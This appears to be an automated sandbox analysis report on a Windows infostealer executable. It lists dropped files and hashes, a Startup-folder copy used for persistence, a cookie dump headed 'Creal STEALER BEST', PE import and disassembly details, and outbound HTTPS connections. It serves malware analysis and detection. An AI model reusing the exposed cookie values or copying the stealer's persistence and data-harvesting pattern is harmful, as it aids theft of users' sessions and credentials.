MD5:	3A80FEA23A007B42CEF8E375FC73AD40
SHA1:	04319F7552EA968E2421C3936C3A9EE6F9CF30B2
SHA-256:	B70D69D25204381F19378E1BB35CC2B8C8430AA80A983F8D0E8E837050BB06EF
SHA-512:	A63BED03F05396B967858902E922B2FBFB4CF517712F91CFAA096FF0539CF300D6B9C659FFEE6BF11C28E79E23115FD6B9C0B1AA95DB1CBD4843487F060CCF40
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I^.f'..f'..f'......f'...&..f'...#..f'...$..f'.o.&..f'..."..f'...&..f'..f&..g'.o....f'.o.'..f'.o.%..f'.Rich.f'.................PE..d......d.........." .........................................................P............`..........................................................0..\....................@..$....v..T............................<..8............0..........@....................text...$........................... ..`.rdata......0......................@..@.data...x(......."..................@....pdata..............................@..@.rsrc...\....0......................@..@.reloc..$....@......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\crcook.txt

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	304
Entropy (8bit):	5.884172523166926
Encrypted:	false
SSDEEP:	6:FO1g2D1Qv3rocHDyzxbiEv3rocHDKJLmIrBNuYraqWTfqgqlB1Hwsv7OjPy:CgC1Qv79EkEv79cBNuMWfqnym7O7y
MD5:	6C931EF1B6F855278DDA9B3D944038A5
SHA1:	534ED390820CE27D07E5A01E91D2F17E90A43604
SHA-256:	BC84DE95C3E3973587A50D19B09E39FDD1D5DB110913C0B269874A49CF0E9C08
SHA-512:	541D247AA103AB949701E768E6C6C75DD6164569561FC26582E3000410B31B7CEC4DF8C9F8BE509FB9875E1CABEB16B701A540B89340BAFF280A5221AFE3F41A
Malicious:	false
Preview:	<--Creal STEALER BEST -->.....google.com.TRUE./.FALSE.2597573456.1P_JAR.2023-10-05-08...google.com.TRUE./.FALSE.2597573456.NID.511=orcSInoZBb6Srw0PdPMNeLGKsegfLi-tQnviho5hKJXKDNg0kXIPnfTcuwV5r7RqjT893pWGJF7klKqldBoj4rDJvxfFlgDOCcW9aKDnU9zIlUh2LP0vO8k3uT0gHJD1JvVAclkJnKwZG6hDAl62HrMxNrUeqSR-WF1J-l9YYgE..

C:\Users\user\AppData\Local\Tempcrchcbyltu.db

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempcrdoofcoiv.db

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempcrglttbjfv.db

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8475592208333753
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
MD5:	BE99679A2B018331EACD3A1B680E3757
SHA1:	6E6732E173C91B0C3287AB4B161FE3676D33449A
SHA-256:	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
SHA-512:	9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempcrgooezxqk.db

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempcrjvsbnudj.db

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempcrqnidvrku.db

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8475592208333753
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
MD5:	BE99679A2B018331EACD3A1B680E3757
SHA1:	6E6732E173C91B0C3287AB4B161FE3676D33449A
SHA-256:	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
SHA-512:	9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempcrtszyuent.db

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempcruquklowu.db

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13884221
Entropy (8bit):	7.996252563059832
Encrypted:	true
SSDEEP:	393216:AIEkZgf8iq1+TtIiFGvvB5IjWqn6eCz1lypRXiWCoaa:rRbiq1QtIZX3ILn6esyaVoaa
MD5:	A4FD5040DB03F0C04306AB7824320269
SHA1:	32A4E4F1C7D0C0FE1BE81BDDECAFEB2303A8227B
SHA-256:	52C7C34BCC42C907A275F706CDE7C03EAB24287F3AEC081F0BD88780DE131E7C
SHA-512:	CA00C6C4CBD5DAB079CE204F9ADABBA1C748869D79A172BDF8AA434AA97DE4C3627273208ECD970159EAE432E5E3BF69E7E860A9CAE07E5A7918C98CD1D0E9C2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d......e.........."....%.....^.................@.............................p............`.....................................................x....`....... ..."...........`..\...0..................................@............... ............................text............................... ..`.rdata...+.......,..................@..@.data...83..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc........`......................@..@.reloc..\....`......................@..B................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.996252563059832
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	HyZh4pn0RF.exe
File size:	13'884'221 bytes
MD5:	a4fd5040db03f0c04306ab7824320269
SHA1:	32a4e4f1c7d0c0fe1be81bddecafeb2303a8227b
SHA256:	52c7c34bcc42c907a275f706cde7c03eab24287f3aec081f0bd88780de131e7c
SHA512:	ca00c6c4cbd5dab079ce204f9adabba1c748869d79a172bdf8aa434aa97de4c3627273208ecd970159eae432e5e3bf69e7e860a9cae07e5a7918c98cd1d0e9c2
SSDEEP:	393216:AIEkZgf8iq1+TtIiFGvvB5IjWqn6eCz1lypRXiWCoaa:rRbiq1QtIZX3ILn6esyaVoaa
TLSH:	99E6334273E15CFAD2E2617342728067AE76E4855721CB8F07B822951F5F3528E3AF72
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?.......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?................

File Icon


Icon Hash:	4a464cd47461e179

Static PE Info

General

Entrypoint:	0x14000c1f0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x65C61AED [Fri Feb 9 12:30:37 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	1af6c885af093afc55142c2f1761dbe8

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F42D4504FBCh
dec eax
add esp, 28h
jmp 00007F42D4504BCFh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F42D4505534h
test eax, eax
je 00007F42D4504D73h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F42D4504D57h
dec eax
cmp ecx, eax
je 00007F42D4504D66h
xor eax, eax
dec eax
cmpxchg dword ptr [0003427Ch], ecx
jne 00007F42D4504D40h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F42D4504D49h
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
movzx eax, byte ptr [00034267h]
test ecx, ecx
mov ebx, 00000001h
cmove eax, ebx
mov byte ptr [00034257h], al
call 00007F42D4505333h
call 00007F42D4506452h
test al, al
jne 00007F42D4504D56h
xor al, al
jmp 00007F42D4504D66h
call 00007F42D45133F1h
test al, al
jne 00007F42D4504D5Bh
xor ecx, ecx
call 00007F42D4506462h
jmp 00007F42D4504D3Ch
mov al, bl
dec eax
add esp, 20h
pop ebx
ret
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [0003421Ch], 00000000h
mov ebx, ecx
jne 00007F42D4504DB9h
cmp ecx, 01h
jnbe 00007F42D4504DBCh
call 00007F42D450549Ah
test eax, eax
je 00007F42D4504D7Ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3cdcc	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x46000	0xf41c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x42000	0x22a4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x56000	0x75c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a330	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3a1f0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x420	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29c90	0x29e00	62616acf257019688180f494b4eb78d4	False	0.5523087686567164	data	6.4831047330596565	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12bf4	0x12c00	1fe5687f7855f18f6b28a489ba524ade	False	0.5184375	data	5.835030929549833	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x3338	0xe00	99d84572872f2ce8d9bdbc2521e1966e	False	0.1328125	Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, text, rows 4294967295, columns 0	1.8271683819747706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x42000	0x22a4	0x2400	39f0a7d8241a665fc55289b5f9977819	False	0.4720052083333333	data	5.316391891279308	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x45000	0x15c	0x200	624222957a635749731104f8cdf6f9b7	False	0.38671875	data	2.83326547900447	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x46000	0xf41c	0xf600	c654ab5a3bc06ebf8c554f36c31153c0	False	0.8030837144308943	data	7.554967714213712	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x56000	0x75c	0x800	4138d4447f190c2657ec208ef31be551	False	0.5458984375	data	5.240127521097618	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x46208	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.585820895522388
RT_ICON	0x470b0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.7360108303249098
RT_ICON	0x47958	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.755057803468208
RT_ICON	0x47ec0	0x952c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9975384937676757
RT_ICON	0x513ec	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.3887966804979253
RT_ICON	0x53994	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.49530956848030017
RT_ICON	0x54a3c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.7207446808510638
RT_GROUP_ICON	0x54ea4	0x68	data	0.7019230769230769
RT_MANIFEST	0x54f0c	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	IsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 18:18:43.994263887 CEST	49706	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:43.994326115 CEST	443	49706	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:43.994472027 CEST	49706	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:43.998116016 CEST	49706	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:43.998137951 CEST	443	49706	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:44.033389091 CEST	49707	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:18:44.033453941 CEST	443	49707	45.112.123.126	192.168.2.8
Sep 27, 2024 18:18:44.033520937 CEST	49707	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:18:44.526863098 CEST	443	49706	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:44.528011084 CEST	49706	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:44.528028011 CEST	443	49706	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:44.529686928 CEST	443	49706	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:44.529740095 CEST	49706	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:44.531833887 CEST	49706	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:44.531970978 CEST	443	49706	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:44.532219887 CEST	49706	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:44.532226086 CEST	443	49706	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:44.579982042 CEST	49706	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:44.676978111 CEST	443	49706	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:44.677047014 CEST	443	49706	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:44.677129030 CEST	49706	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:44.678383112 CEST	49706	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:44.695563078 CEST	49708	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:44.695663929 CEST	443	49708	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:44.695738077 CEST	49708	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:44.696288109 CEST	49708	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:44.696325064 CEST	443	49708	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:45.510128975 CEST	443	49708	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:45.564070940 CEST	49708	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:45.594831944 CEST	49708	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:45.594856977 CEST	443	49708	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:45.596183062 CEST	443	49708	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:45.596200943 CEST	443	49708	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:45.596266985 CEST	49708	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:45.746890068 CEST	49708	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:45.747128010 CEST	443	49708	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:45.798475981 CEST	49708	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:45.798501015 CEST	443	49708	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:45.822628021 CEST	49708	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:45.863400936 CEST	443	49708	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:46.016722918 CEST	443	49708	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:46.016807079 CEST	443	49708	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:46.016870975 CEST	49708	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:46.021781921 CEST	49708	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:46.031369925 CEST	49709	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:46.031430006 CEST	443	49709	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:46.031486034 CEST	49709	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:46.032150030 CEST	49709	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:46.032164097 CEST	443	49709	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:46.317967892 CEST	49707	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:18:46.318030119 CEST	443	49707	45.112.123.126	192.168.2.8
Sep 27, 2024 18:18:46.520754099 CEST	443	49709	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:46.521287918 CEST	49709	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:46.521323919 CEST	443	49709	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:46.522392988 CEST	443	49709	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:46.522455931 CEST	49709	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:46.523838997 CEST	49709	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:46.523920059 CEST	443	49709	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:46.524059057 CEST	49709	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:46.524059057 CEST	49709	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:46.524069071 CEST	443	49709	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:46.567452908 CEST	443	49709	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:46.610974073 CEST	49709	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:46.715251923 CEST	443	49709	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:46.715389013 CEST	443	49709	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:46.715605021 CEST	49709	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:46.716367960 CEST	49709	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:46.717377901 CEST	49710	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:46.717417002 CEST	443	49710	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:46.718552113 CEST	49710	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:46.718902111 CEST	49710	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:46.718914986 CEST	443	49710	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:46.983944893 CEST	443	49707	45.112.123.126	192.168.2.8
Sep 27, 2024 18:18:46.984663010 CEST	49707	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:18:46.984697104 CEST	443	49707	45.112.123.126	192.168.2.8
